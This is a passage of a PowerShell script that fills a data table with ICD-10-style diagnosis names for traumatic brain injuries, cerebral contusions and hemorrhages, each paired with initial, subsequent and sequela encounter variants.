$DiagnosisList.Rows.Add("Unspecified focal traumatic brain injury without loss of consciousness","Unspecified focal traumatic brain injury without loss of consciousness, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified focal traumatic brain injury without loss of consciousness","Unspecified focal traumatic brain injury without loss of consciousness, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified focal traumatic brain injury with loss of consciousness of 30 minutes or less","Unspecified focal traumatic brain injury with loss of consciousness of 30 minutes or less, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified focal traumatic brain injury with loss of consciousness of 30 minutes or less","Unspecified focal traumatic brain injury with loss of consciousness of 30 minutes or less, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified focal traumatic brain injury with loss of consciousness of 30 minutes or less","Unspecified focal traumatic brain injury with loss of consciousness of 30 minutes or less, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified focal traumatic brain injury with loss of consciousness of 31 minutes to 59 minutes","Unspecified focal traumatic brain injury with loss of consciousness of 31 minutes to 59 minutes, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified focal traumatic brain injury with loss of consciousness of 31 minutes to 59 minutes","Unspecified focal traumatic brain injury with loss of consciousness of 31 minutes to 59 minutes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified focal traumatic brain injury with loss of consciousness of 31 minutes to 59 minutes","Unspecified focal traumatic brain injury with loss of consciousness of 31 minutes to 59 minutes, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified focal traumatic brain injury with loss of consciousness of 1 hour to 5 hours 59 minutes","Unspecified focal traumatic brain injury with loss of consciousness of 1 hour to 5 hours 59 minutes, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified focal traumatic brain injury with loss of consciousness of 1 hour to 5 hours 59 minutes","Unspecified focal traumatic brain injury with loss of consciousness of 1 hour to 5 hours 59 minutes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified focal traumatic brain injury with loss of consciousness of 1 hour to 5 hours 59 minutes","Unspecified focal traumatic brain injury with loss of consciousness of 1 hour to 5 hours 59 minutes, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified focal traumatic brain injury with loss of consciousness of 6 hours to 24 hours","Unspecified focal traumatic brain injury with loss of consciousness of 6 hours to 24 hours, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified focal traumatic brain injury with loss of consciousness of 6 hours to 24 hours","Unspecified focal traumatic brain injury with loss of consciousness of 6 hours to 24 hours, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified focal traumatic brain injury with loss of consciousness of 6 hours to 24 hours","Unspecified focal traumatic brain injury with loss of consciousness of 6 hours to 24 hours, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified focal traumatic brain injury with loss of consciousness greater than 24 hours with return to pre-existing conscious level","Unspecified focal traumatic brain injury with loss of consciousness greater than 24 hours with return to pre-existing conscious level, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified focal traumatic brain injury with loss of consciousness greater than 24 hours with return to pre-existing conscious level","Unspecified focal traumatic brain injury with loss of consciousness greater than 24 hours with return to pre-existing conscious level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified focal traumatic brain injury with loss of consciousness greater than 24 hours with return to pre-existing conscious level","Unspecified focal traumatic brain injury with loss of consciousness greater than 24 hours with return to pre-existing conscious level, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified focal traumatic brain injury with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving","Unspecified focal traumatic brain injury with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified focal traumatic brain injury with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving","Unspecified focal traumatic brain injury with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified focal traumatic brain injury with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving","Unspecified focal traumatic brain injury with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified focal traumatic brain injury with loss of consciousness of any duration with death due to brain injury prior to regaining consciousness","Unspecified focal traumatic brain injury with loss of consciousness of any duration with death due to brain injury prior to regaining consciousness, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified focal traumatic brain injury with loss of consciousness of any duration with death due to other cause prior to regaining consciousness","Unspecified focal traumatic brain injury with loss of consciousness of any duration with death due to other cause prior to regaining consciousness, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified focal traumatic brain injury with loss of consciousness of unspecified duration","Unspecified focal traumatic brain injury with loss of consciousness of unspecified duration, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified focal traumatic brain injury with loss of consciousness of unspecified duration","Unspecified focal traumatic brain injury with loss of consciousness of unspecified duration, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified focal traumatic brain injury with loss of consciousness of unspecified duration","Unspecified focal traumatic brain injury with loss of consciousness of unspecified duration, sequela") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of right cerebrum without loss of consciousness","Contusion and laceration of right cerebrum without loss of consciousness, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of right cerebrum without loss of consciousness","Contusion and laceration of right cerebrum without loss of consciousness, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of right cerebrum without loss of consciousness","Contusion and laceration of right cerebrum without loss of consciousness, sequela") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of right cerebrum with loss of consciousness of 30 minutes or less","Contusion and laceration of right cerebrum with loss of consciousness of 30 minutes or less, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of right cerebrum with loss of consciousness of 30 minutes or less","Contusion and laceration of right cerebrum with loss of consciousness of 30 minutes or less, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of right cerebrum with loss of consciousness of 30 minutes or less","Contusion and laceration of right cerebrum with loss of consciousness of 30 minutes or less, sequela") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of right cerebrum with loss of consciousness of 31 minutes to 59 minutes","Contusion and laceration of right cerebrum with loss of consciousness of 31 minutes to 59 minutes, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of right cerebrum with loss of consciousness of 31 minutes to 59 minutes","Contusion and laceration of right cerebrum with loss of consciousness of 31 minutes to 59 minutes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of right cerebrum with loss of consciousness of 31 minutes to 59 minutes","Contusion and laceration of right cerebrum with loss of consciousness of 31 minutes to 59 minutes, sequela") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of right cerebrum with loss of consciousness of 1 hour to 5 hours 59 minutes","Contusion and laceration of right cerebrum with loss of consciousness of 1 hour to 5 hours 59 minutes, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of right cerebrum with loss of consciousness of 1 hour to 5 hours 59 minutes","Contusion and laceration of right cerebrum with loss of consciousness of 1 hour to 5 hours 59 minutes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of right cerebrum with loss of consciousness of 1 hour to 5 hours 59 minutes","Contusion and laceration of right cerebrum with loss of consciousness of 1 hour to 5 hours 59 minutes, sequela") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of right cerebrum with loss of consciousness of 6 hours to 24 hours","Contusion and laceration of right cerebrum with loss of consciousness of 6 hours to 24 hours, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of right cerebrum with loss of consciousness of 6 hours to 24 hours","Contusion and laceration of right cerebrum with loss of consciousness of 6 hours to 24 hours, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of right cerebrum with loss of consciousness of 6 hours to 24 hours","Contusion and laceration of right cerebrum with loss of consciousness of 6 hours to 24 hours, sequela") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of right cerebrum with loss of consciousness greater than 24 hours with return to pre-existing conscious level","Contusion and laceration of right cerebrum with loss of consciousness greater than 24 hours with return to pre-existing conscious level, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of right cerebrum with loss of consciousness greater than 24 hours with return to pre-existing conscious level","Contusion and laceration of right cerebrum with loss of consciousness greater than 24 hours with return to pre-existing conscious level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of right cerebrum with loss of consciousness greater than 24 hours with return to pre-existing conscious level","Contusion and laceration of right cerebrum with loss of consciousness greater than 24 hours with return to pre-existing conscious level, sequela") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of right cerebrum with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving","Contusion and laceration of right cerebrum with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of right cerebrum with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving","Contusion and laceration of right cerebrum with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of right cerebrum with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving","Contusion and laceration of right cerebrum with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving, sequela") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of right cerebrum with loss of consciousness of any duration with death due to brain injury prior to regaining consciousness","Contusion and laceration of right cerebrum with loss of consciousness of any duration with death due to brain injury prior to regaining consciousness, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of right cerebrum with loss of consciousness of any duration with death due to other cause prior to regaining consciousness","Contusion and laceration of right cerebrum with loss of consciousness of any duration with death due to other cause prior to regaining consciousness, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of right cerebrum with loss of consciousness of unspecified duration","Contusion and laceration of right cerebrum with loss of consciousness of unspecified duration, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of right cerebrum with loss of consciousness of unspecified duration","Contusion and laceration of right cerebrum with loss of consciousness of unspecified duration, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of right cerebrum with loss of consciousness of unspecified duration","Contusion and laceration of right cerebrum with loss of consciousness of unspecified duration, sequela") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of left cerebrum without loss of consciousness","Contusion and laceration of left cerebrum without loss of consciousness, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of left cerebrum without loss of consciousness","Contusion and laceration of left cerebrum without loss of consciousness, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of left cerebrum without loss of consciousness","Contusion and laceration of left cerebrum without loss of consciousness, sequela") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of left cerebrum with loss of consciousness of 30 minutes or less","Contusion and laceration of left cerebrum with loss of consciousness of 30 minutes or less, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of left cerebrum with loss of consciousness of 30 minutes or less","Contusion and laceration of left cerebrum with loss of consciousness of 30 minutes or less, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of left cerebrum with loss of consciousness of 30 minutes or less","Contusion and laceration of left cerebrum with loss of consciousness of 30 minutes or less, sequela") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of left cerebrum with loss of consciousness of 31 minutes to 59 minutes","Contusion and laceration of left cerebrum with loss of consciousness of 31 minutes to 59 minutes, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of left cerebrum with loss of consciousness of 31 minutes to 59 minutes","Contusion and laceration of left cerebrum with loss of consciousness of 31 minutes to 59 minutes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of left cerebrum with loss of consciousness of 31 minutes to 59 minutes","Contusion and laceration of left cerebrum with loss of consciousness of 31 minutes to 59 minutes, sequela") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of left cerebrum with loss of consciousness of 1 hour to 5 hours 59 minutes","Contusion and laceration of left cerebrum with loss of consciousness of 1 hour to 5 hours 59 minutes, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of left cerebrum with loss of consciousness of 1 hour to 5 hours 59 minutes","Contusion and laceration of left cerebrum with loss of consciousness of 1 hour to 5 hours 59 minutes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of left cerebrum with loss of consciousness of 1 hour to 5 hours 59 minutes","Contusion and laceration of left cerebrum with loss of consciousness of 1 hour to 5 hours 59 minutes, sequela") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of left cerebrum with loss of consciousness of 6 hours to 24 hours","Contusion and laceration of left cerebrum with loss of consciousness of 6 hours to 24 hours, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of left cerebrum with loss of consciousness of 6 hours to 24 hours","Contusion and laceration of left cerebrum with loss of consciousness of 6 hours to 24 hours, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of left cerebrum with loss of consciousness of 6 hours to 24 hours","Contusion and laceration of left cerebrum with loss of consciousness of 6 hours to 24 hours, sequela") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of left cerebrum with loss of consciousness greater than 24 hours with return to pre-existing conscious level","Contusion and laceration of left cerebrum with loss of consciousness greater than 24 hours with return to pre-existing conscious level, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of left cerebrum with loss of consciousness greater than 24 hours with return to pre-existing conscious level","Contusion and laceration of left cerebrum with loss of consciousness greater than 24 hours with return to pre-existing conscious level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of left cerebrum with loss of consciousness greater than 24 hours with return to pre-existing conscious level","Contusion and laceration of left cerebrum with loss of consciousness greater than 24 hours with return to pre-existing conscious level, sequela") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of left cerebrum with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving","Contusion and laceration of left cerebrum with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of left cerebrum with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving","Contusion and laceration of left cerebrum with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of left cerebrum with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving","Contusion and laceration of left cerebrum with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving, sequela") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of left cerebrum with loss of consciousness of any duration with death due to brain injury prior to regaining consciousness","Contusion and laceration of left cerebrum with loss of consciousness of any duration with death due to brain injury prior to regaining consciousness, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of left cerebrum with loss of consciousness of any duration with death due to other cause prior to regaining consciousness","Contusion and laceration of left cerebrum with loss of consciousness of any duration with death due to other cause prior to regaining consciousness, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of left cerebrum with loss of consciousness of unspecified duration","Contusion and laceration of left cerebrum with loss of consciousness of unspecified duration, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of left cerebrum with loss of consciousness of unspecified duration","Contusion and laceration of left cerebrum with loss of consciousness of unspecified duration, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of left cerebrum with loss of consciousness of unspecified duration","Contusion and laceration of left cerebrum with loss of consciousness of unspecified duration, sequela") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of cerebrum, unspecified, without loss of consciousness","Contusion and laceration of cerebrum, unspecified, without loss of consciousness, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of cerebrum, unspecified, without loss of consciousness","Contusion and laceration of cerebrum, unspecified, without loss of consciousness, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of cerebrum, unspecified, without loss of consciousness","Contusion and laceration of cerebrum, unspecified, without loss of consciousness, sequela") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of cerebrum, unspecified, with loss of consciousness of 30 minutes or less","Contusion and laceration of cerebrum, unspecified, with loss of consciousness of 30 minutes or less, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of cerebrum, unspecified, with loss of consciousness of 30 minutes or less","Contusion and laceration of cerebrum, unspecified, with loss of consciousness of 30 minutes or less, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of cerebrum, unspecified, with loss of consciousness of 30 minutes or less","Contusion and laceration of cerebrum, unspecified, with loss of consciousness of 30 minutes or less, sequela") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of cerebrum, unspecified, with loss of consciousness of 31 minutes to 59 minutes","Contusion and laceration of cerebrum, unspecified, with loss of consciousness of 31 minutes to 59 minutes, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of cerebrum, unspecified, with loss of consciousness of 31 minutes to 59 minutes","Contusion and laceration of cerebrum, unspecified, with loss of consciousness of 31 minutes to 59 minutes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of cerebrum, unspecified, with loss of consciousness of 31 minutes to 59 minutes","Contusion and laceration of cerebrum, unspecified, with loss of consciousness of 31 minutes to 59 minutes, sequela") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of cerebrum, unspecified, with loss of consciousness of 1 hour to 5 hours 59 minutes","Contusion and laceration of cerebrum, unspecified, with loss of consciousness of 1 hour to 5 hours 59 minutes, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of cerebrum, unspecified, with loss of consciousness of 1 hour to 5 hours 59 minutes","Contusion and laceration of cerebrum, unspecified, with loss of consciousness of 1 hour to 5 hours 59 minutes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of cerebrum, unspecified, with loss of consciousness of 1 hour to 5 hours 59 minutes","Contusion and laceration of cerebrum, unspecified, with loss of consciousness of 1 hour to 5 hours 59 minutes, sequela") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of cerebrum, unspecified, with loss of consciousness of 6 hours to 24 hours","Contusion and laceration of cerebrum, unspecified, with loss of consciousness of 6 hours to 24 hours, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of cerebrum, unspecified, with loss of consciousness of 6 hours to 24 hours","Contusion and laceration of cerebrum, unspecified, with loss of consciousness of 6 hours to 24 hours, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of cerebrum, unspecified, with loss of consciousness of 6 hours to 24 hours","Contusion and laceration of cerebrum, unspecified, with loss of consciousness of 6 hours to 24 hours, sequela") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of cerebrum, unspecified, with loss of consciousness greater than 24 hours with return to pre-existing conscious level","Contusion and laceration of cerebrum, unspecified, with loss of consciousness greater than 24 hours with return to pre-existing conscious level, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of cerebrum, unspecified, with loss of consciousness greater than 24 hours with return to pre-existing conscious level","Contusion and laceration of cerebrum, unspecified, with loss of consciousness greater than 24 hours with return to pre-existing conscious level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of cerebrum, unspecified, with loss of consciousness greater than 24 hours with return to pre-existing conscious level","Contusion and laceration of cerebrum, unspecified, with loss of consciousness greater than 24 hours with return to pre-existing conscious level, sequela") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of cerebrum, unspecified, with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving","Contusion and laceration of cerebrum, unspecified, with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of cerebrum, unspecified, with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving","Contusion and laceration of cerebrum, unspecified, with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of cerebrum, unspecified, with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving","Contusion and laceration of cerebrum, unspecified, with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving, sequela") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of cerebrum, unspecified, with loss of consciousness of any duration with death due to brain injury prior to regaining consciousness","Contusion and laceration of cerebrum, unspecified, with loss of consciousness of any duration with death due to brain injury prior to regaining consciousness, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of cerebrum, unspecified, with loss of consciousness of any duration with death due to other cause prior to regaining consciousness","Contusion and laceration of cerebrum, unspecified, with loss of consciousness of any duration with death due to other cause prior to regaining consciousness, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of cerebrum, unspecified, with loss of consciousness of unspecified duration","Contusion and laceration of cerebrum, unspecified, with loss of consciousness of unspecified duration, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of cerebrum, unspecified, with loss of consciousness of unspecified duration","Contusion and laceration of cerebrum, unspecified, with loss of consciousness of unspecified duration, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion and laceration of cerebrum, unspecified, with loss of consciousness of unspecified duration","Contusion and laceration of cerebrum, unspecified, with loss of consciousness of unspecified duration, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of right cerebrum without loss of consciousness","Traumatic hemorrhage of right cerebrum without loss of consciousness, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of right cerebrum without loss of consciousness","Traumatic hemorrhage of right cerebrum without loss of consciousness, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of right cerebrum without loss of consciousness","Traumatic hemorrhage of right cerebrum without loss of consciousness, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of right cerebrum with loss of consciousness of 30 minutes or less","Traumatic hemorrhage of right cerebrum with loss of consciousness of 30 minutes or less, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of right cerebrum with loss of consciousness of 30 minutes or less","Traumatic hemorrhage of right cerebrum with loss of consciousness of 30 minutes or less, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of right cerebrum with loss of consciousness of 30 minutes or less","Traumatic hemorrhage of right cerebrum with loss of consciousness of 30 minutes or less, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of right cerebrum with loss of consciousness of 31 minutes to 59 minutes","Traumatic hemorrhage of right cerebrum with loss of consciousness of 31 minutes to 59 minutes, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of right cerebrum with loss of consciousness of 31 minutes to 59 minutes","Traumatic hemorrhage of right cerebrum with loss of consciousness of 31 minutes to 59 minutes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of right cerebrum with loss of consciousness of 31 minutes to 59 minutes","Traumatic hemorrhage of right cerebrum with loss of consciousness of 31 minutes to 59 minutes, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of right cerebrum with loss of consciousness of 1 hours to 5 hours 59 minutes","Traumatic hemorrhage of right cerebrum with loss of consciousness of 1 hours to 5 hours 59 minutes, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of right cerebrum with loss of consciousness of 1 hours to 5 hours 59 minutes","Traumatic hemorrhage of right cerebrum with loss of consciousness of 1 hours to 5 hours 59 minutes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of right cerebrum with loss of consciousness of 1 hours to 5 hours 59 minutes","Traumatic hemorrhage of right cerebrum with loss of consciousness of 1 hours to 5 hours 59 minutes, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of right cerebrum with loss of consciousness of 6 hours to 24 hours","Traumatic hemorrhage of right cerebrum with loss of consciousness of 6 hours to 24 hours, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of right cerebrum with loss of consciousness of 6 hours to 24 hours","Traumatic hemorrhage of right cerebrum with loss of consciousness of 6 hours to 24 hours, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of right cerebrum with loss of consciousness of 6 hours to 24 hours","Traumatic hemorrhage of right cerebrum with loss of consciousness of 6 hours to 24 hours, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of right cerebrum with loss of consciousness greater than 24 hours with return to pre-existing conscious level","Traumatic hemorrhage of right cerebrum with loss of consciousness greater than 24 hours with return to pre-existing conscious level, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of right cerebrum with loss of consciousness greater than 24 hours with return to pre-existing conscious level","Traumatic hemorrhage of right cerebrum with loss of consciousness greater than 24 hours with return to pre-existing conscious level, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of right cerebrum with loss of consciousness greater than 24 hours with return to pre-existing conscious level","Traumatic hemorrhage of right cerebrum with loss of consciousness greater than 24 hours with return to pre-existing conscious level, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of right cerebrum with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving","Traumatic hemorrhage of right cerebrum with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of right cerebrum with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving","Traumatic hemorrhage of right cerebrum with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of right cerebrum with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving","Traumatic hemorrhage of right cerebrum with loss of consciousness greater than 24 hours without return to pre-existing conscious level with patient surviving, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of right cerebrum with loss of consciousness of any duration with death due to brain injury prior to regaining consciousness","Traumatic hemorrhage of right cerebrum with loss of consciousness of any duration with death due to brain injury prior to regaining consciousness, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of right cerebrum with loss of consciousness of any duration with death due to other cause prior to regaining consciousness","Traumatic hemorrhage of right cerebrum with loss of consciousness of any duration with death due to other cause prior to regaining consciousness, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of right cerebrum with loss of consciousness of unspecified duration","Traumatic hemorrhage of right cerebrum with loss of consciousness of unspecified duration, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of right cerebrum with loss of consciousness of unspecified duration","Traumatic hemorrhage of right cerebrum with loss of consciousness of unspecified duration, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of right cerebrum with loss of consciousness of unspecified duration","Traumatic hemorrhage of right cerebrum with loss of consciousness of unspecified duration, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of left cerebrum without loss of consciousness","Traumatic hemorrhage of left cerebrum without loss of consciousness, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of left cerebrum without loss of consciousness","Traumatic hemorrhage of left cerebrum without loss of consciousness, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of left cerebrum without loss of consciousness","Traumatic hemorrhage of left cerebrum without loss of consciousness, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of left cerebrum with loss of consciousness of 30 minutes or less","Traumatic hemorrhage of left cerebrum with loss of consciousness of 30 minutes or less, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of left cerebrum with loss of consciousness of 30 minutes or less","Traumatic hemorrhage of left cerebrum with loss of consciousness of 30 minutes or less, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of left cerebrum with loss of consciousness of 30 minutes or less","Traumatic hemorrhage of left cerebrum with loss of consciousness of 30 minutes or less, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of left cerebrum with loss of consciousness of 31 minutes to 59 minutes","Traumatic hemorrhage of left cerebrum with loss of consciousness of 31 minutes to 59 minutes, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of left cerebrum with loss of consciousness of 31 minutes to 59 minutes","Traumatic hemorrhage of left cerebrum with loss of consciousness of 31 minutes to 59 minutes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of left cerebrum with loss of consciousness of 31 minutes to 59 minutes","Traumatic hemorrhage of left cerebrum with loss of consciousness of 31 minutes to 59 minutes, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of left cerebrum with loss of consciousness of 1 hours to 5 hours 59 minutes","Traumatic hemorrhage of left cerebrum with loss of consciousness of 1 hours to 5 hours 59 minutes, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of left cerebrum with loss of consciousness of 1 hours to 5 hours 59 minutes","Traumatic hemorrhage of left cerebrum with loss of consciousness of 1 hours to 5 hours 59 minutes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of left cerebrum with loss of consciousness of 1 hours to 5 hours 59 minutes","Traumatic hemorrhage of left cerebrum with loss of consciousness of 1 hours to 5 hours 59 minutes, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of left cerebrum with loss of consciousness of 6 hours to 24 hours","Traumatic hemorrhage of left cerebrum with loss of consciousness of 6 hours to 24 hours, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic hemorrhage of left cerebrum with loss of consciousness of 6 hours to 24 hours","Traumatic hemorrhage of left cerebrum with loss of consciousness of 6 hours to 24 hours, subsequent encounter") + $null = 